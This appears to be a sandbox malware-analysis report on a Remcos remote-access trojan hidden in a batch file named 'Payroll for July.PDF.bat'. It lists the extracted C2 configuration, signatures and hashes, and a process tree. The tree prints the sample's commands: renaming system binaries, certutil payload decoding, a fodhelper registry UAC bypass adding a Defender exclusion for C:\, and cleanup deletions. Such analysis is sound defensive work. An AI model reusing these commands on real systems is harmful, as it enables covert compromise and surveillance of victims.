Analysis

  • max time kernel
    143s
  • max time network
    127s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
  • submitted
    28-07-2024 01:14

General

  • Target

    Payroll for July.PDF.bat

  • Size

    4.9MB

  • MD5

    221325197f9623e7be8285e05b28c8db

  • SHA1

    e96b0bf85a8b3e9544eed7b2db4db08bbaee5707

  • SHA256

    68711195c07e287987488f7045c7147501ccfbae22318b8460d01a86d2f09599

  • SHA512

    30b445175c2700065cfecc18d839f4129297435f94649fc5f5fdc489a3151e4544abcf40e2923e2d2002e438f6bf03cdc4cdbd21d44344cc2306c25cc401e98e

  • SSDEEP

    49152:qILm52gH9tPNjLtDgqYQQLg74MmPp1E1TlUQdbKvqsCOP1Ru4JmB/po9c4:5

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

127.0.0.1:54888

zuesremmy.duckdns.org:54888

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-Z19JY9

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Executes dropped EXE 27 IoCs
  • Loads dropped DLL 9 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Kills process with taskkill 2 IoCs
  • Modifies registry class 5 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\Payroll for July.PDF.bat"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:524
    • C:\Windows\System32\extrac32.exe
      C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
      2⤵
        PID:2156
      • C:\Users\Public\alpha.exe
        C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
        2⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:1792
        • C:\Windows\system32\extrac32.exe
          extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
          3⤵
            PID:2472
        • C:\Users\Public\alpha.exe
          C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\Payroll for July.PDF.bat" "C:\\Users\\Public\\Defux.mpeg" 3
          2⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:2312
          • C:\Users\Public\kn.exe
            C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\Payroll for July.PDF.bat" "C:\\Users\\Public\\Defux.mpeg" 3
            3⤵
            • Executes dropped EXE
            PID:2060
        • C:\Users\Public\alpha.exe
          C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Defux.mpeg" "C:\\Users\\Public\\Libraries\\Defux.COM" 10
          2⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:2676
          • C:\Users\Public\kn.exe
            C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Defux.mpeg" "C:\\Users\\Public\\Libraries\\Defux.COM" 10
            3⤵
            • Executes dropped EXE
            PID:1992
        • C:\Users\Public\Libraries\Defux.COM
          C:\Users\Public\Libraries\Defux.COM
          2⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Adds Run key to start application
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: CmdExeWriteProcessMemorySpam
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:2848
          • C:\Users\Public\Libraries\gspwscdY.pif
            C:\Users\Public\Libraries\gspwscdY.pif
            3⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:2360
            • C:\Windows\system32\cmd.exe
              "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\18AF.tmp\18B0.tmp\18B1.bat C:\Users\Public\Libraries\gspwscdY.pif"
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:1916
              • C:\Windows\System32\extrac32.exe
                C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
                5⤵
                  PID:2008
                • C:\Users\Public\alpha.exe
                  C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows "
                  5⤵
                  • Executes dropped EXE
                  PID:2836
                • C:\Users\Public\alpha.exe
                  C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32"
                  5⤵
                  • Executes dropped EXE
                  PID:2516
                • C:\Users\Public\alpha.exe
                  C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
                  5⤵
                  • Executes dropped EXE
                  • Suspicious use of WriteProcessMemory
                  PID:1392
                  • C:\Windows\system32\extrac32.exe
                    extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
                    6⤵
                      PID:2428
                  • C:\Users\Public\alpha.exe
                    C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
                    5⤵
                    • Executes dropped EXE
                    • Suspicious use of WriteProcessMemory
                    PID:1228
                    • C:\Windows\system32\extrac32.exe
                      extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
                      6⤵
                        PID:1396
                    • C:\Users\Public\alpha.exe
                      C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
                      5⤵
                      • Executes dropped EXE
                      PID:1760
                      • C:\Windows\system32\extrac32.exe
                        extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
                        6⤵
                          PID:396
                      • C:\Users\Public\alpha.exe
                        C:\\Users\\Public\\alpha /c start /wait C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
                        5⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        PID:2032
                        • C:\Users\Public\xkn.exe
                          C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
                          6⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2908
                          • C:\Users\Public\alpha.exe
                            "C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
                            7⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            PID:1948
                            • C:\Users\Public\ger.exe
                              C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
                              8⤵
                              • Executes dropped EXE
                              • Modifies registry class
                              PID:1788
                      • C:\Users\Public\alpha.exe
                        C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe
                        5⤵
                        • Executes dropped EXE
                        PID:2004
                        • C:\Windows\system32\taskkill.exe
                          taskkill /F /IM SystemSettings.exe
                          6⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2492
                      • C:\Users\Public\alpha.exe
                        C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettingsAdminFlows.exe
                        5⤵
                        • Executes dropped EXE
                        PID:1072
                        • C:\Windows\system32\taskkill.exe
                          taskkill /F /IM SystemSettingsAdminFlows.exe
                          6⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3016
                      • C:\Users\Public\alpha.exe
                        C:\\Users\\Public\\alpha /c ping 127.0.0.1 -n 5
                        5⤵
                        • Executes dropped EXE
                        • System Network Configuration Discovery: Internet Connection Discovery
                        PID:1764
                        • C:\Windows\system32\PING.EXE
                          ping 127.0.0.1 -n 5
                          6⤵
                          • System Network Configuration Discovery: Internet Connection Discovery
                          • Runs ping.exe
                          PID:1696
                      • C:\Users\Public\alpha.exe
                        C:\\Users\\Public\\alpha /c del /q "C:\Windows \System32\*"
                        5⤵
                        • Executes dropped EXE
                        PID:680
                      • C:\Users\Public\alpha.exe
                        C:\\Users\\Public\\alpha /c rmdir "C:\Windows \System32"
                        5⤵
                        • Executes dropped EXE
                        PID:1076
                      • C:\Users\Public\alpha.exe
                        C:\\Users\\Public\\alpha /c rmdir "C:\Windows \"
                        5⤵
                        • Executes dropped EXE
                        PID:1720
                      • C:\Users\Public\alpha.exe
                        C:\\Users\\Public\\alpha /c del /q "C:\\Windows \\System32\\per.exe" / A / F / Q / S
                        5⤵
                        • Executes dropped EXE
                        PID:2392
                      • C:\Users\Public\alpha.exe
                        C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\ger.exe" / A / F / Q / S
                        5⤵
                        • Executes dropped EXE
                        PID:2040
                      • C:\Users\Public\alpha.exe
                        C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\xkn.exe" / A / F / Q / S
                        5⤵
                        • Executes dropped EXE
                        PID:568
                  • C:\Windows\SysWOW64\extrac32.exe
                    C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\Public\Libraries\Defux.COM C:\\Users\\Public\\Libraries\\Ydcswpsg.PIF
                    3⤵
                    • System Location Discovery: System Language Discovery
                    PID:624
                  • C:\Windows\SysWOW64\colorcpl.exe
                    C:\Windows\System32\colorcpl.exe
                    3⤵
                    • System Location Discovery: System Language Discovery
                    PID:1780
                • C:\Users\Public\alpha.exe
                  C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
                  2⤵
                  • Executes dropped EXE
                  PID:3012
                • C:\Users\Public\alpha.exe
                  C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\Defux.mpeg" / A / F / Q / S
                  2⤵
                  • Executes dropped EXE
                  PID:2656

              Network

              MITRE ATT&CK Enterprise v15

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\ProgramData\remcos\logs.dat

                Filesize

                146B

                MD5

                742fa53fc988c2a26674a406ed5d0f9c

                SHA1

                f064670f7f215d9dd227b81657197af306c4dc97

                SHA256

                ebbfc19074d1311687b5717157761dd8cb6f016496b9c14b0d023fb1e8db2e07

                SHA512

                2c905110bd74b53132143e8ff0f6d375067ddbb03b75580d1326949ff6a4c2a0a14e8fbf00492642975caebe2920436f665aeeb59759c040bdd349ad1188bb50

              • C:\Users\Admin\AppData\Local\Temp\18AF.tmp\18B0.tmp\18B1.bat

                Filesize

                1KB

                MD5

                2828cc267a1c0676d317df16b891334a

                SHA1

                6d1f6449a1b77aefcc6911e4ab93906bf70f896a

                SHA256

                cad29a052bcb297f5497d6c1a9d37bd938f9d3d7d75b6645f4221f379cf215ff

                SHA512

                842305116619f8ef90801d9e9067bfb8aebd8244506a879aa8ba8d80bbeba12a945b7e58d96138e5ddaf684e5350c3b05437ab965050bd23a436d99e6da0bf05

              • C:\Users\Admin\AppData\Local\Temp\Cab1518.tmp

                Filesize

                70KB

                MD5

                49aebf8cbd62d92ac215b2923fb1b9f5

                SHA1

                1723be06719828dda65ad804298d0431f6aff976

                SHA256

                b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

                SHA512

                bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

              • C:\Users\Admin\AppData\Local\Temp\Tar1589.tmp

                Filesize

                181KB

                MD5

                4ea6026cf93ec6338144661bf1202cd1

                SHA1

                a1dec9044f750ad887935a01430bf49322fbdcb7

                SHA256

                8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

                SHA512

                6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

              • C:\Users\Public\Defux.mpeg

                Filesize

                3.4MB

                MD5

                7d64215898b7d6037b0863b10257b747

                SHA1

                1e5c8cf0d8961f7a2128d53933a374aca29d1f7c

                SHA256

                7af8dff6d15de6862d34cba46e7705275a5a07ac9bf6303f9ec917ff8811e3a7

                SHA512

                866757bd3e77004f7dbebe640f9d0eea7e12740bbc075af19044b03f36703c739f8042ea246eb41aec84e58bf60a71af610cab35fba4a1f8dcfbd34c354be5f6

              • C:\Users\Public\Libraries\Defux.COM

                Filesize

                984KB

                MD5

                06bcbd36656fbfdbd73023f9df4fbcf0

                SHA1

                7e4843dca4d8bb7bcd68513848f5725f26b380e5

                SHA256

                0bde51c2efedcc1dc13504c70a1856f6bfb904c54b9a23b87d8aad5eda6e238f

                SHA512

                683217d47883305325a87909cfbd6378e97e3e452d565a09a7ed13d8fd6bc01ab54ff1c2f8f47c59bfc17ddb26dd3634e05a67e117cf5f1db72571cb521e371c

              • C:\Users\Public\ger.exe

                Filesize

                73KB

                MD5

                9d0b3066fe3d1fd345e86bc7bcced9e4

                SHA1

                e05984a6671fcfecbc465e613d72d42bda35fd90

                SHA256

                4e66b857b7010db8d4e4e28d73eb81a99bd6915350bb9a63cd86671051b22f0e

                SHA512

                d773ca3490918e26a42f90f5c75a0728b040e414d03599ca70e99737a339858e9f0c99711bed8eeebd5e763d10d45e19c4e7520ee62d6957bc9799fd62d4e119

              • C:\Users\Public\kn.exe

                Filesize

                1.1MB

                MD5

                ec1fd3050dbc40ec7e87ab99c7ca0b03

                SHA1

                ae7fdfc29f4ef31e38ebf381e61b503038b5cb35

                SHA256

                1e19c5a26215b62de1babd5633853344420c1e673bb83e8a89213085e17e16e3

                SHA512

                4e47331f2fdce77b01d86cf8e21cd7d6df13536f09b70c53e5a6b82f66512faa10e38645884c696b47a27ea6bddc6c1fdb905ee78684dca98cbda5f39fbafcc2

              • \Users\Public\Libraries\gspwscdY.pif

                Filesize

                66KB

                MD5

                c116d3604ceafe7057d77ff27552c215

                SHA1

                452b14432fb5758b46f2897aeccd89f7c82a727d

                SHA256

                7bcdc2e607abc65ef93afd009c3048970d9e8d1c2a18fc571562396b13ebb301

                SHA512

                9202a00eeaf4c5be94de32fd41bfea40fc32d368955d49b7bad2b5c23c4ebc92dccb37d99f5a14e53ad674b63f1baa6efb1feb27225c86693ead3262a26d66c6

              • \Users\Public\alpha.exe

                Filesize

                337KB

                MD5

                5746bd7e255dd6a8afa06f7c42c1ba41

                SHA1

                0f3c4ff28f354aede202d54e9d1c5529a3bf87d8

                SHA256

                db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386

                SHA512

                3a968356d7b94cc014f78ca37a3c03f354c3970c9e027ed4ccb8e59f0f9f2a32bfa22e7d6b127d44631d715ea41bf8ace91f0b4d69d1714d55552b064ffeb69e

              • \Users\Public\xkn.exe

                Filesize

                462KB

                MD5

                852d67a27e454bd389fa7f02a8cbe23f

                SHA1

                5330fedad485e0e4c23b2abe1075a1f984fde9fc

                SHA256

                a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8

                SHA512

                327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d

              • memory/1780-153-0x0000000023190000-0x0000000023212000-memory.dmp

                Filesize

                520KB

              • memory/1780-142-0x0000000023190000-0x0000000023212000-memory.dmp

                Filesize

                520KB

              • memory/1780-175-0x0000000023190000-0x0000000023212000-memory.dmp

                Filesize

                520KB

              • memory/1780-174-0x0000000023190000-0x0000000023212000-memory.dmp

                Filesize

                520KB

              • memory/1780-167-0x0000000023190000-0x0000000023212000-memory.dmp

                Filesize

                520KB

              • memory/1780-162-0x0000000000670000-0x0000000000689000-memory.dmp

                Filesize

                100KB

              • memory/1780-165-0x0000000000670000-0x0000000000689000-memory.dmp

                Filesize

                100KB

              • memory/1780-131-0x00000000030F0000-0x00000000040F0000-memory.dmp

                Filesize

                16.0MB

              • memory/1780-132-0x0000000023190000-0x0000000023212000-memory.dmp

                Filesize

                520KB

              • memory/1780-135-0x0000000023190000-0x0000000023212000-memory.dmp

                Filesize

                520KB

              • memory/1780-137-0x0000000023190000-0x0000000023212000-memory.dmp

                Filesize

                520KB

              • memory/1780-136-0x0000000023190000-0x0000000023212000-memory.dmp

                Filesize

                520KB

              • memory/1780-139-0x0000000023190000-0x0000000023212000-memory.dmp

                Filesize

                520KB

              • memory/1780-140-0x0000000023190000-0x0000000023212000-memory.dmp

                Filesize

                520KB

              • memory/1780-141-0x0000000023190000-0x0000000023212000-memory.dmp

                Filesize

                520KB

              • memory/1780-166-0x0000000000670000-0x0000000000689000-memory.dmp

                Filesize

                100KB

              • memory/1780-144-0x0000000023190000-0x0000000023212000-memory.dmp

                Filesize

                520KB

              • memory/1780-143-0x0000000023190000-0x0000000023212000-memory.dmp

                Filesize

                520KB

              • memory/1780-161-0x0000000023190000-0x0000000023212000-memory.dmp

                Filesize

                520KB

              • memory/1780-160-0x0000000023190000-0x0000000023212000-memory.dmp

                Filesize

                520KB

              • memory/1780-152-0x0000000023190000-0x0000000023212000-memory.dmp

                Filesize

                520KB

              • memory/2360-76-0x0000000000400000-0x000000000041A000-memory.dmp

                Filesize

                104KB

              • memory/2360-75-0x0000000000400000-0x0000000001400000-memory.dmp

                Filesize

                16.0MB

              • memory/2360-123-0x0000000000400000-0x0000000001400000-memory.dmp

                Filesize

                16.0MB

              • memory/2360-124-0x0000000000400000-0x000000000041A000-memory.dmp

                Filesize

                104KB

              • memory/2360-73-0x0000000000400000-0x0000000001400000-memory.dmp

                Filesize

                16.0MB

              • memory/2848-30-0x0000000000400000-0x0000000000500000-memory.dmp

                Filesize

                1024KB

              • memory/2908-104-0x0000000001D40000-0x0000000001D48000-memory.dmp

                Filesize

                32KB

              • memory/2908-103-0x000000001B3D0000-0x000000001B6B2000-memory.dmp

                Filesize

                2.9MB